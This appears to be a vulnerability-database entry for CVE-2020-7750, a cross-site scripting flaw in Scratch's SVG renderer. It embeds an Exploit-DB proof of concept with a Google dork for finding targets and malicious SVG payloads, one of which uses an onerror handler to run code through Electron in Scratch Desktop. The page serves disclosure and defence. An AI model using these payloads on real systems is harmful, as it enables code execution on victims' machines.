CVE-2020-7750

unknown

Published 2020-11-09 · Modified 2026-03-13

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Cross-Site Scripting in scratch-svg-renderer

Predictions

Exploit likelihood

30%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-50079 webapps multiple text · 2 KB

Stig Magnus Baugstø · 2021-07-02

Scratch Desktop 3.17 - Remote Code Execution

text exploit Source: Exploit-DB

# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
# Date: 2021-06-18
# Exploit Author: Stig Magnus Baugstø
# Vendor Homepage: https://scratch.mit.edu/
# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
# Version: 3.10.2
# Tested on: Windows 10 x64, but should be platform independent.
# CVE: CVE-2020-7750

Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008

CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/

You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:

	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
		<image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />
	</svg>

The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.

Example of regular cross-site scripting (XSS):

	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
		<image href="doesNotExist.png" onerror="alert('Pwned!')" />
	</svg>

The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):

	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
		<image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />
	</svg>

The example above launches cmd.exe (Command Prompt) on Windows.

For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/

Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.

Package impact

Ecosystem	Package	Vulnerable	Fixed
npm	scratch-svg-renderer	`<0.2.0-prerelease.20201019174008`	`0.2.0-prerelease.20201019174008`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.